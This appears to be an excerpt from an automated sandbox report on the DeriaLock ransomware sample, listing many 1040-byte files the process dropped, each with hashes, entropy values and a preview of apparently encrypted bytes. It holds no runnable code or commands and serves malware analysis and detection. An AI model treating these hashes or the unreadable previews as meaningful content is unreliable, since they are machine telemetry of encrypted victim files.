                                                                                                                                                            SHA-512:7D8316ACDAEC575C45389365CC56F2A01FF03E4ABD9236A494729202B368871D04D515F89DE2ED9A250FEAF6EA2EE26E700904BCD1A39600A8593A56EC202C49
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..w..o2...xJ58.`..M....u[=.M/.. ..e.d..<...$ N....l...{.?..q...h..+A.....|...@.g.z..."t..J....k.."U._.&x..5...$...B,..#.....27...j..P..8}}....uWz.l.Y.S..?...E.O......VG..:.r,.pm....D.6..#.*."..(a. ]l.....@.....zSf...T...!N.E..Q%.W..H.".!.@..&P.......f.....j..................e5G....N..u8....w..*...{..'P........9....;.X0..d.d.)TXi...%.C...s.g..$+....#gU._u/n.2.4..\..`..t.o.&.V...]4..?.....A1.s....gn.|.....W}4.....2y.0L..oI<.......>....Wv..q.d*M./t.....y..C.....lVq...|+.=.E...W>bE....].D./.a@l4Y...:.........t...g;?j.4T.q.....O..k.+.......&".O..2V@.AdMj_.....2..F..@...y....y.Q..Hq.."T..f.F.P.w..".....v.SP!!.Qr9.....Q.|..^.~..AY.}....f......B.r...bn.E.}....3.;.0c..Y......A..+,G..EZj..+..R.Wy.3....1.@..F..j,.......v9.g..I}..Q..3...h+..z[Z{..B....G#TM.QE.o.UV.9..?....(.....%.tV.g.c....j$3.K.........T...h.,sU........W.a....a..-.E..o........}h!E..wF....p.}.j...............e..U......$..x|{..#.+.w....em....B..;..Y......h..b..f......{/....X.....u.*3.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.76491722680334
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:3nnW4ofNnT6gED/T8mxxa/JSoOsupil/28S2zD74hH1z7Dmm6XHTUuRj6RSW0Qpf:3nsTXQS/6sv/bS2zwDbG3wAlW8g/1
                                                                                                                                                            MD5:781832984EE63D33816174E36511C453
                                                                                                                                                            SHA1:F6E9A023E16AB1BE20CEEE26C699BE754D8916E5
                                                                                                                                                            SHA-256:BDDBEFCDA23E9861D98BEAAD0B4426445CBF04317968D67B9BBB3C6E39FA3331
                                                                                                                                                            SHA-512:0CF42D576CCB221BE2F982F924992FDDEB6367940F1B7C501B2C6A1627A959AB2B2F823713454A401A7E5F97C61C32376FC3CC1E58C0D60DC11E5A44727E947E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..k.i5.&..9..Uv...E....E.....+.......{=..j e....+.W.-}.(.+....!Lme.av...Y....g..q1........-.....t[......3+h]=....4..M..9;.:d.r.x.Z..{./.{,UXHi..3...g.E.......a..d.o.h.b+.r....Z.....o.f..r.Gz.t...b.%.e....q..........D...L.!3'\0p5........L..@}.V&E..-...1..s...-.e..e...b.3.q...S.GS..&...A.c.....e.5.1..{(c...`...b.Q....+...2.[.z<...^.....@t=.....}q9,6.1-.9......'i...Fi_...X..i=.e...b......~.Lh.K{..u._.._...F.y.......57..x?VE.....}Yw...S_.Y7z.[...`.yRt.u&.......#%f...E...*6.q.L=\......(F..VPc.....0/.......3.f.=.... ..GD7.........`.D.>V7..I&...y.m....].i7.E.t...Dm....[$....{.......5}=...]3.[.....q.&j.W.U.[WG..(.M&..g~.&.I........[...,.k.....^.h.i.S.hJ..'.Rr.....:.z...pH7.l.?..l.....M..=...+..'.@.<..+.".5D......T-......g(..(...s.E.6.....&L..]+..5t....~F......mJ...r.$.f.Oh..^...#.,4-i3..._..9.v4.h.:).q..s.Z.W..`O......CB...h.......@....7.t....q..:.;.LJ.........o.p.....y.......~S.f...f.\y....h..;..L..s..x_v...S.......t..y.6K.?......U.}.pJ.&0..8.J9
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.786889052354417
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:/eiRGswLC668OzGA682PiOAYjZ+Mz97mKuRmDKXk1Iap7q2:WiRGswLCzOmKamDKU+apG2
                                                                                                                                                            MD5:A490EC134C997BE1EC6AAADAFD2791EE
                                                                                                                                                            SHA1:9D09C8AE1C05B5AD7B2A0A698836DB89EBE83ACF
                                                                                                                                                            SHA-256:C941C605CF14106729E472FC3467FDFD2CCCA054C9AFF186A66989079B3EAC6D
                                                                                                                                                            SHA-512:71E7DEE8B76C7D4A28639D099C04BC01CE34362FC69650465164FC1493002C0828F3C2029E6C27392D4ACED9B6210A8BA2984AA8CD603055B78A031785FF35C9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:S.[..$...g<..HZ........?r)..*;V.........'.y.z.x...ro..(....1<'.FY.F..= ..=v...9...DL"...j...dG....o.fA<!...'A..r...9.~.}.F*..a......!E.J. ..\.../mG....d.l..E.h.`j......].D..q...:i..9,.y.&.....o..^zQ......f..J.9.$..|R.V...C..be]...}v|.yo...N.8M..#.r.BM`...W....*..+e8...k3.20i..2..Ut..X..kYIJ{:xiy.e.l[.BE.1B..n....:....8.....^'.h....\;.<..f.^.....~F../..]."Om...".2..}>n}B.?.r.....O.......UR...r..~*]............/..yi......S.X.9kUY..eo........z...k\P.U...o..j'@.....[4.s..U!+c..}t....$T..'.6).{q`fB..Z..Q!.........'..4.J8i.f.Sl.nRN2. Q...j.`..Vs..d.k...,.5'.@....FU.o .N.V9.]G..!.......v..@......9 ..H?.k...C.q......k.x.........?.N.G.F3.Z....D..' ...q.\.o..~.vP..1.Z......,..8FL.z..z8:...h........![)....CnY.u.oE.d......p..A.....s.5.A..^.t{..S.O'.....*._.l:?<...- .......\>N...h...S......U9...G..l..`}...6.....]j...\......./k..8..,Z...e....1...*A.....1T.R....,..../].=HQQ.....,$...u.xC1......{.....(iy.._.........Y..e.......`.+..G..O.woiM<j..mC.. ..Vj.(
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.805970115160664
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:wLsAxn6Lkd7S2qKRUkrc7vcAVGO5NAH/mOkAJAZihK:wLFxn6oqKRlQ7vJx5NAHGAoH
                                                                                                                                                            MD5:FD75A2F31AE4996B65EED2F6F169FAB2
                                                                                                                                                            SHA1:CF766B9EB7402B5921A28C7D41E2634264BB03B6
                                                                                                                                                            SHA-256:508F0AA0FEA5FF867D2A8968EC0DE7A7513D067A9FCDA8092B5355A8429FEF58
                                                                                                                                                            SHA-512:898E922FACE0D1134F9A3E42FCA05DAE1DC4FFF15C6D3D9A427C2130FFF7D03479D7BC45A3BCB5298856553400D70A82174B3933531AD3BA97A54CE2F192E102
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:=...Fx....S\c%Ct..4v.....Xn_p..P..e....NN|.Y.........C...u...la......%.u....<9.Kc#p..r=.v G....4..."E3.|.J%..7Xs..p...R...........8n.y...Q......N]../CY.......6l../...1*.. [o......[.;....4K....>.npE\..-.y.||s.....$...A. ......x`_..+.[a.8MG..s..I....;*@..b....y...-.|.,7... ...P.C#.<E...8..x%3..(Z.:...8NeAO...S......%n.vw.[,L.N@...].D..Z=.6.1......,0..z..?sD.=u..0..&..L.R....8.i.`......p...a...s...B...P......=c...o.R..o...0.2...^.8o...y..?@9.(.......TQ.I..O.....N....J.d5..=...<.7;.9}HWw.a...J.'Z.....C...0>o.m......2g...u.vG..[f.....\...]..s6X...6..A2d..Y.vq..L?(>...;-t.vzr.2_.}.....S......v.D..&....Fe....&..s.Y.Oct[.#...v......#.T@.`#....y.d..).......U.[*K.AM. Y!.MYU.Q.e..E.R5..ttU.X.`.....[}u.L..fV@.=fO.1.^k..p1....}.LKc..E.e...w.............=uR..,.S...`...G..~.[....@z....mrg.$!...|u....+M.......F.@.....Y.....)3...e.3.<.`_j}..7R.....^...o..pu..2"....6..Vl..i....3..........F..M%@.`I.G.....o].Z.u..{...,....R....+...N.w.....&X'&.....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.7824010931803755
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:jowBDwZ3CAze1vu0CEQlVXB2NY0URg4jJ5dB1:kwBD+3y7CflVXYURhJ5d7
                                                                                                                                                            MD5:20F16254A5CC7132CCBEC56C56C90431
                                                                                                                                                            SHA1:163D86E2162F9CD8DED8D92BD28EAE7F7B7464B3
                                                                                                                                                            SHA-256:8E263C3CFCAEE99847EB868E8F8363CEF9DA4CA861E989A16EBFAB3319E30EA9
                                                                                                                                                            SHA-512:DC1FE52F859BCB43EF2581147A873B1DC8BC5704190C22D02EAC821A727D8B9E6BDF7D2E87AE6D3D0D8FE65E9918CAF1F2B59CE3BF60548D5CEE70748A0D998C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.i....D".9...{.......L...q.j.H...0OXh.u...X.Sf..a./#...?..&...~{)a.|.o.....*.....A.k..5......2..i.(....p........t.9...+.0F./..B.....B."e.S9A.;...}8......Y.....AX..#H...5U....)..BB.$fh~......^....Z2.W.~...c...l.S...v..<..p..{....N.%.G....T.t.....jg..&.h..... u.).rG.%Uf.....k.V}.)..&j.Z...%......?...q/UU#.....{.;.b.rb....K6....P.b%..j....\..w..A.....|.... .....yw...D..~.....{Hn.1..,.L..Op.Hi.yX...d.>B.N9....<..*.$.Z..q.j......|Ti..4Q."..P......&B.G.{.!d..`\..+.4'.v$.7~'.s?.7.4..%....x..%...D}...r|j5.......P.r...}......'.>...S.P2../}`Q.....+g...(..Z...+f....Vr.:._F5.mLt.....zx...#.]+\.5.w.....H.......v..B.D._.~......uX7)...1..$...(.Up...A9...A..Vad.Z.Mp...7....*....".....d..K.9.3!....-~.S7....fz..=F..B.............C...=$c<t.O.....f..AZ..G.}+IM;+.,.+5....x..uR.....*,.......)5.......Qp[_.1`S(Lv.h.?..j...k...N..2.BZa..j..fu.Q.khkK...1..5T.+>]...W:.k.p....".........58.".CZ..X.....[\.:Q..8.P.J...li.P.(....W.u,..].............
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.827564857979509
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:gOuj3MJp1uiC14kCql6JEybHTXSWhVqJQCA41:gOQMJpfCNEJEgTXNpe
                                                                                                                                                            MD5:010FEB0CC900C1CEA361A545EEA1498B
                                                                                                                                                            SHA1:9F07155CBEFF9BB05CBD4F0E5261CC4B263EFE4B
                                                                                                                                                            SHA-256:CBDD673739A85EE14773ABA84890EB8CBA392158C5022FB9A4A19C327B706027
                                                                                                                                                            SHA-512:04DE0A61EA79437B09057D8B8ED70C15C1E8C388FD543C3AF9BFD8C1F9E2024FDE825D64FC7046426FDEA764C0D0F83520E6DF08AB43E18530779397AA2CB26A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.Y.+.$...z...j..]+8...W.C.KH.>.!nY.n..`...8:..!y..E..l|......y..Iw"L..!..,....@...!Y........;...At.8..*.C....9;....1....s.Ng...M?.>\.....c..<Z.t.3...YS...^.8..i8@.D...u*R}.R.t..&..W1.Xb..)..[H......I....z..MbE.{b-.....L4..N.f...N......s....V..J.?K../@..-..%...|5.<.l.I.....t O.BhI.&..T,....De..3...u .....[..4..Q.;i\.cv).%...d-..dv..6D%..'...S._.%u.I.....D.........-.$4..ii".: j......."HJ..j..7.D5.G.e....6..N.!v....<._...D#h........u.........r...8..p``Ic-.n,...e...6...Vt...X&.nL.A...Oy.&...9......:+..{..rT....S.FG).Z..S..>R}nj...s.Y....J.(T].&..*0.Rr.m...w.,..D9/`.........un.0.r...,.....8.....r.T.22....P4......:F...xP.j.v..........^.].N.."..k..7l.l3.SdK.....g.D."4x..T2..s..oo.....#.$..{...t`.@......n...Ps-u....e....o(..HC...F[...........;.B%.."e......U.....Ynm..t=....W$._.T.`:.X.J.p.mc`..'g+{...........>.t.S'.r8hU:q..../.4.0tQ....7E?....}g..Y.W8O#..1....Us.......P....'...i..{.C|..0.+Wx#.(..`....].Am.vnQp.::Yx.......5.^...;...=........AP.!.z..`
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.80926944431343
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:KWXRpOgBx9zrpBPRn89IMvjJd02qW1n2pvWfgL8J6yVEsDikBHe3EdgWEI8Zj:KWXR9xVpBPO9IUJeu1n2p58JZasWQpan
                                                                                                                                                            MD5:B53ED50C7C66A5F05F62186C29798B4B
                                                                                                                                                            SHA1:030FB2B14B8902A6AD5B5B587EDD3A5CAFDB146C
                                                                                                                                                            SHA-256:B6348161B21E4B1BBF6C614186878D3624D4A91B201D97D2C7D093760E259846
                                                                                                                                                            SHA-512:403805DEF6D2EFE3F7075BD87F0D31D65013D2085D86859D3730DD357207D731BB250801E5FBD45C011B1DC62BDA446909531E3DC198DB12FEDCB984DD571D49
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.a.....hC..B.S._x....(.-3.x.......&..3T.vK.<.<.O.....pL...O.?_.....f.hY=..Ix\.#.._.l.F....)...@......R.C4....tQ.......[*.B.."....[0.8.d..9..o.~.../.$.<..\...T..U....D......D...4..p...Q..^..v"...sf^.E.}.M..X......*..NfAh...*.l....dL]f.>..O.....:v.$.....V...lb.`.>..........Y.I.].5....I$...dJ..A.._..\..)...=.8.PX.e.....@8`.:.{.}nO.s5.D6.,dh.3...P.v.;....m.`!.Bg......v?h\R.&@F...[a...li.~F.D..59U.D..6...t.......bV..h0.M........s.4o.2[........x4.rh.c!.B...'|$.g...qx...:...f.a.)U.....+.....j-....|.T#..t..C6QQ.q.'+./....D*W/....+.l4LbFBW..3.......P....d..`.S...R...~P.9a.(.....=.....3..O&..x:-~....*...H}H.}(..YD..\...m..,..W...'.p....r]`+.-&.y. ...Wa"..K..D .G.e.}.....OSA.G.......o6.7.25...#.g.aJf<...h..t.......j..O....Lo.^..q...N.N8.L.......W.K.....c.....e..r.....lA..L.$.!...(.x$xWBc..`.D.'/....`_....r.._...P.=...gV... 2)g.k...z.K..a...M..cFx..'c....$....Ih.a!...H.D2b.B..u..Sq>=[{..xIM....r9$P..N.........,pM.L...N.(....s..{d.9.CS`..Yt..".......(.a.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.802659077858019
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:IqM4ld3Pq/iS8t3DHfvUf3fjwuLGkIYkwNGGd3D44mOY:IufafrFJ1VNGGd3HJY
                                                                                                                                                            MD5:6CFBACFB9F8B7148CE1611462ECA8B88
                                                                                                                                                            SHA1:3374B59F3FBA98BAF2CAA2467D435C4CC63E5588
                                                                                                                                                            SHA-256:9CF5941CC9FED1929E7A6785BCF476B33DDF37141F2779FD6E59A9910D2547A6
                                                                                                                                                            SHA-512:198E956FE1A08EE55D88DD694857F9969F72E74672E28D337CEE1F02EEE402F26E03E11828446E36BEB5FA7879C865D92D2251EA7092FD3BCA43BC9D2941AFAE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:R....D0.w.;...,..d...U.?.]n....@@U......U..7..[.-../..9.'...>..).>.M..6M..Z.^.Z+...d..1.H?_.5..1@h.K1?.....G.....<./M.&:j..L...F.Y@.....C.oG.T.F.J&....I.n`.y\6...r.(.|.... .Z=#.,ry......H...#.l.G..d..T."..*...|.-..eS..^.3.F..o..}^....cK....e.[..f.Z].u>@.../.....b7a..+..........np...b.BM.*Wf..}._..T%H~<!H.Y...a...Dq..x...19.].*?.!......8.Iu2)..........f.........6.:...@...[-..0R..RTF.U.QP....}U..+..n..H/t...9..OSimMa..'...3:&...+S$..7...#..?............$K......t...}.. m.[..sE.DJ....L.<.5.]..a....gvc:9.: k...[...(..g.7:.......W.vV#...?}>.<..7....t....M.r..=^..mEC...K....]..$.....5.t..T..~....../.Ep.U.....0...e..%NZ#d.U....H.-D....U......I.b..i|@...d...!.m.G.@eut..p...O........rV9>.QTM..`.[rm*...~n.#....}..}MF.:8.x....].....^r..C.c....{32.+L}` .u..<.9....s......>....N........A..k'.y...".3.....$'.r..g..yq..6...[!.Pz.?..P-3L.MmR.^Q.d....d....)p...%VF..B.'f.I#r....e....v*....k|..5...q~iJ.+.........i+.;c.$0......##H.e..I.K..O..n.N.W=..Yu..'.b....M.DdI..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.821738194607653
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:k3G6eHk8OizEGX1cdk0JVDB6c8llfpErjyxR0/Qkxw/bV:BPvX1cZB6xVErcOQkxw/B
                                                                                                                                                            MD5:ED48975AADA9B87AE300D02CDEBA17B8
                                                                                                                                                            SHA1:8B46B5492EF6BD6FE1F6F82598A8B6FFA9242143
                                                                                                                                                            SHA-256:0FD8B64EF72E03860775434447B596FAAD75B4C81AF5C50913C5BD7411041FAE
                                                                                                                                                            SHA-512:161632A1FB603AA4A5A4F464BCD4CC782E0B6D23964E9BB6680AE2CA0325932808BA0587D4E0C9FB88240F45E7FF67806F5D9DEA442B41E20A1605D09D1A241E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview: .6.~.F.D.W...~.u...oU}]_/.=.......dW...,...+...%..,8....j.,H...].%.......1.h.?........7%}..E....Dq...L.{.l`.4U.Q...$.[/`.TG..)......([..&.=.F6X)l|q73.W....*...R...-l8..7..o)...V...v...q.....@P.F.L.~..z.~{.A2...}-.x.?l[..]...e..1.B..B.~'.\b.v...!...u......I.La......o.V.....i...D(fD..}W..\?.....?...*I.A...S.EK1.{.b....+.n.n.......E.1.e.g,../1.[..=Dv.Q#f.'R.(..%2...`.....".d.Nr.....H..#id\..TpQ..../......z.._...$..#...t..t4*.Ng...#..>.a".[..T...;..c.A.e)...J..+..j...`_....`.o....)G.X...m. .h.a[.{ ....M...\P.Wv.9q........H..O......#.`...~ >.r,...9.....5.a.F.}.A.[.n......D.N3!;]..F{.=.....N...mr.+..<..Oe<..........V.......).7 .....b/A......>..2..\Z...T..Pk.y0Z.... .....oB..-.........2..uFL..O...4Y.Fw..........}..e.....#...V..D..G<.....LJG)...........{0?.?`..CqN..%L..<.....Z.t....\tPm..os.......,.... Y@M.}....q-I..........[r'.xg.B.....I.A.t;..4.K..H....r...MS.....D.J...U0...0`./.J......ed..|%.&hk..E......}`..D.......#>..}.a...w.:N...$
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.812558481927927
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:AzHPNWlcsMqaU1hNkpy+NDu7AEjPcoRQqJ5GYCMB5M:A7NWlcsxSpy+NDuPjPL7Gtp
                                                                                                                                                            MD5:F853B1806452D85697BE0E0DB845BE8A
                                                                                                                                                            SHA1:DFD288575B72AAF12743B82901E4383688A8FA64
                                                                                                                                                            SHA-256:3098FBFCFBFD9818345B114096FBA03802C1670C11AD1C83774286EF36559DAC
                                                                                                                                                            SHA-512:2E5FFCEB6FD8093DBE2095D7E8A686307D56891690400FCAFF5B9315579A3111A86113DD45FBEE993827FF151665C1D70AC23952CE86B0660A9E3FB961D4F4E0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:`.4...qD.j6.M..b....G.9M..CaP'P..m..|?%. ).z.).....x.j+I$ROt..../...W.....(^...`...E..r.xls..\.k.H]|..A.Zrn....R..@..B..!.....t...1i........5.:...X......1t.4...E..R./Lt...].jy.......|7-.X.~...Y.UB.e.O..'?.j..S...l..]..Q...2/....p..q.*Ulw........3..f.-w[....TH....Z.6NcQ.6G|O.....e=w....x..C.h\.!k..d........-.R...l.<........)...n.P....x..H.Q6x.5J.C...S.#o........yy2gF..'..1.5......}.*kT...P.._.K.-.*...S..........!4.+..>w...,.V.A.+'"...1.1d...d"O......M..t/..!OEK[..XH....\....t.g..T[.c...AB/87+.mTA.#.l..&N....WP...}^y....G.....:!....n.%...K.....@...T..n..}..N..]+.n..k......D..F...\.-..-G.....Rpt{..oK......bVE..s....V>8.../.7.....*...\r..F..A$_h..V.jcW....y5.A.^....|d..e.n.....^......[./.AI...-y].i.t6...IS...U.,.h.:n.1+.8L..?...ne6^..a.><Xc..`P.v....k..(Y....0P..K.|.jK...5..V.2m. .,.....M.i.Mx.........Z.o._...B.j..wk..3...Q~.-.>...,zM'...<)....{.s.E.o...>U..nn.....e..dE.S.W..?......0.Tp|...j. .#.(.F._..421rp.+..R-f.....:.*.......b.*+:.yeP^.D..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.809734011467633
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:7kXdRHIiH29ymJhqsY0oYbBFhQg5+GJJnhj4BsLCZCdhr9:YXD4vSsiYBFGgUGbnhcWLLn
                                                                                                                                                            MD5:CCF93907BCE8330AF138B34AD02423AC
                                                                                                                                                            SHA1:7FE9801E978A3D0018E5FE6D47149A676DB4D1D6
                                                                                                                                                            SHA-256:F3A4D09B1967CD6DAC33B982ACEA7EF91B00DB46D33BB9A74E558333C4C96A7E
                                                                                                                                                            SHA-512:51EF26572D9F010006E81CFFE04C964DE06606E50EFD903F66CA565326ECD7C305B85FD2768BBF84886E660AD56A715115ED40160A30FDFCA3D413AB7FFDBC58
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:jS.+y....$..y...X.y|a....Y.EdGG..c.k.X..5..j.<.k..?.i.7W..\../..)..h.`.-X?...\.?.D..A...W...m......y..Q..7.5...".&.N..8......w./.<..CI.D...._.{......N....hvL.K...R.1f......Ea...^r.`.....u....p.Im:...[.O..0..U?<t@`....~s........Q....t=..qt.M.{.......e..,-4........q.'.|.\....S...!.{.G..K..'.F.._K.'a.&...E.../.V....>.... WJ.G...:^......n.^"....2....Kn....0).S.%>%b..Y.....MB.7}...B.+..!.$..>.....{....OV..=..de.-{.S)..$....(.:..H.s.>.V9ISv..1.....o..a.;f..Q@.h.m-~....f.M...f.f.s..}..SI.u.5..d{...<..6;H.#...{..l.a.f..%]...D..."...81....>..L B.....-..7..E.q..... qF...$:.oS.>......m....NS..S...,..m.S..5,..!...\V..>....oq...=....Pu|sTr.5i.vc.......XNj^R..R..z..|.....3./.^./>2.2.a......s.$(qy.E..D.s.'.n.v[.e$.3.........M."....)9..c.+]......./..i`tA...f...H.uV..).t...T.X...p..dn..1..Z....{.r.....j.....2a.c......(...}.....x..Az&....z...HDe`".E...e..n.^.%.......P.....z......... @). YR.?..Yk.....2.Upw..9....f.Uvsm......#..."."EZH.3.A:.{."7X....'P..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8214908309019195
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:CYvl601IJZ8gW6bVdwyFeHaT0sRU80MW0TmsjWV06:nw0xgJ44eHahRdTW0SbVZ
                                                                                                                                                            MD5:60F8A8DBED689D328961D663B94BFD05
                                                                                                                                                            SHA1:A7ABC6C1C7D6F443DF39B0778CA1121EC36145DA
                                                                                                                                                            SHA-256:FEA56AA296504E28FC46BA2CA57503FE13751AB60984B25361BAEE2B0FF91782
                                                                                                                                                            SHA-512:2BDC7DE0B4371204E9B6673A6D82B90D870DF4AA87AD34C0C2345173D738F2EF2013DD914BEBE6527D0B1510C49BE1DA236114673490549E91DD1934D04FF7CE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...Qz}..fV......CS v..Yg..|...q.._Z])L._..Af...qlKR......b1M0.?f."..U..Q,..j.{#qM.2.X....^.{...u....0di.. ...,..F.o2.F&.+Dw.......Y...FJ.....k.'.0M...$..z\.9...............~..}n...lo..@'q..;.~..o.>wS....?...~A,.uh.[.|C..b'...&.iw2........;...B8.2...N.S..4...K...g.8.>..W&.~.89...1F.e.o?bdb..Rjoa...9V.s..t.5.*.(.P..+)f0'...C.......V.L...).F}Bq..b....GPB;-3..5!..FV....U.>MVj....>._..%.E.....|.....u}w.......R%7t.)....%.....g..;1.,..o......7..._\s>..i.i.s(.......N.a...<Z......(...[..Z..0.{=........g6.{OT..........v...R...X..PPD..j.k.7..q..Rj.Do)....k.a)_..:.a..M^....!_..l..~N.1. We..i..Bn<.h./>..f">..d.%..>.... ..I;..1..........F.W.L.e.=...'I_.......%)7...........>..r...H....Zoz...\|3.....;{.........V`-..|+.Pm.JY}i.QY8V.1.~.c..Z.UCv....V...r........m..W..#.u.Y...n.....>.<F....;.#".'..^S.Z..........<..U.`.Z..-W.vi..p.L)8{*..A...\T..0`..G,.+.{W..S..ZGy...=..y.*i.e.v.. De...ox...[(...z:E......~.....@.4.hQ.5.ZB.B2..e@F.z.N..:.......|A..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.842614083833278
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:NVtdW/a4Az8UDSfbPGJKGNvtT2469INEE3ss8kOhQXOC/Vf30s:BdWy44DSUNF2469INd8ZPhZsVp
                                                                                                                                                            MD5:47557F150130B041456163290F9C273F
                                                                                                                                                            SHA1:E17068170C5302D0D1824AD0B0617EC77E92FE31
                                                                                                                                                            SHA-256:D96B6E91EDE93E9A78A7DB2A284F34A588AE48C59261ADB7A5D965865A644ABF
                                                                                                                                                            SHA-512:23B710838B104FF1D602418144AB562C2F0156730D09226B3612E4173DBE9770F57EDDEE3810D25331A56AD7580BC3E04AF1C6F1418DE13560F6FB75F68DBF0B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:........L.SS.Qqb..&s!3.../...rg...Y...#6.....C.'%....P`..]....S..1.C.....> {....i~.p...l..>.Y.c,....7....c.>.l.8..g.....S}/..q.......5."...f.\}..d...E.. .u..^..#.y?.|.....i.4.E...0..F..J.fQ.'<oMN..2.R6..)4..:`....21....a...X..[..Q~I.([..v.....S...5,.K^....+yT[M9..&...B....|.........DJ.;...z<v..h>..-.....V...5..@.d..W..Mr..4.-.k2.s..k..lG[9...9.f.f...H......7.r....P`.....9S...~S.{..K..04.1~gE..,..e..*.h..6_..9".6t...e..I.>..`L0.{;.....Ru.....)j.E.c.J;H.0?.<...R.....x.t.g..;y.5.(F;.6...{|$.B+...6H.2.{..2.M.4..g&..Ib.6.,1.d..-........d....#.m!..HiX..V....=...oe...+)YUf..3.'...3..fg....-...7.v.E..>...gso.=>.......O0....9.,...N..'...IL.s.U.m.....F?F2@.../...b.hV..E.."....8..v...IL.w...}..u..~...\z.....F..{....'bHal1.B..ni.0.......#.}T...r..HV$H...;.<nK.'..y.3t8.....jt...7.........V......$...<...-......m$]O..).YN...tZ....X.!|+.k^hx.?F...0.O...f......e.R.:....Fm.l(.1.c..n....p#...q..j..u.?.54.>....+.Xj...w.........J....9.......nC..S3.....m"...I.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.827107093859249
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:g0SOmcPu6TvmrcmnlMdobLPkWy4i/B0QTIdcEsa:dKcmZvnlMuuF0ld/N
                                                                                                                                                            MD5:3CD6A653879AA30853BDD0CFA21FF898
                                                                                                                                                            SHA1:B949A1A3DDD5301FCEC53AC85E26F13C1BD74CC5
                                                                                                                                                            SHA-256:65218BED92E71197E9614DBEE10315A253865254FEE0A90FA80BBB52F0D67311
                                                                                                                                                            SHA-512:CAC97E64BCB7AD65965B9A86D847B7B8410244C56C5C1EB1CB173869C4FEEDE3698CD03C45BEED8C0598095ACE8FD6DC17A35C26F2E7FBAA9AEEBC33089A5FD5
